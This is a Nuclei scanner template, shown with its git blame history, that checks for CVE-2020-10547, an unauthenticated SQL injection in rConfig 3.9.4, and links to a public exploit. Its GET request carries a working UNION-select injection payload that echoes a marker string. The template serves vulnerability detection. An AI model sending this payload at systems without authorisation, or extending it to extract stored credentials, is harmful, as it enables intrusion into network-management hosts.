nuclei-templates/http/cves/2020/CVE-2020-10547.yaml

41 lines
1.5 KiB
YAML
Raw Normal View History

2021-02-14 19:31:26 +00:00
id: CVE-2020-10547
2021-02-14 19:31:26 +00:00
info:
2022-11-29 05:34:31 +00:00
name: rConfig 3.9.4 - SQL Injection
2021-02-14 19:31:26 +00:00
author: madrobot
severity: critical
description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.
2021-03-21 07:03:04 +00:00
reference:
- https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
- https://github.com/theguly/exploits/blob/master/CVE-2020-10547.py
- https://theguly.github.io/2020/09/rconfig-3.9.4-multiple-vulnerabilities/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-10547
2023-07-11 19:49:27 +00:00
cwe-id: CWE-89
2023-08-31 11:46:18 +00:00
epss-score: 0.4901
cpe: cpe:2.3:a:rconfig:rconfig:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.97048
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: rconfig
product: rconfig
tags: cve,cve2020,rconfig,sqli
2021-02-14 19:31:26 +00:00
http:
2021-02-14 19:31:26 +00:00
- method: GET
path:
- "{{BaseURL}}/compliancepolicyelements.inc.php?search=True&searchField=antani'+union+select+(select+concat(0x223e3c42523e5b70726f6a6563742d646973636f766572795d)+limit+0,1),NULL,NULL,NULL,NULL+--+&searchColumn=elementName&searchOption=contains"
2023-07-11 19:49:27 +00:00
2021-02-14 19:31:26 +00:00
matchers-condition: and
matchers:
- type: word
2023-07-11 19:49:27 +00:00
part: body
2021-02-14 19:31:26 +00:00
words:
- "[project-discovery]"
2023-07-11 19:49:27 +00:00
- type: status
status:
- 200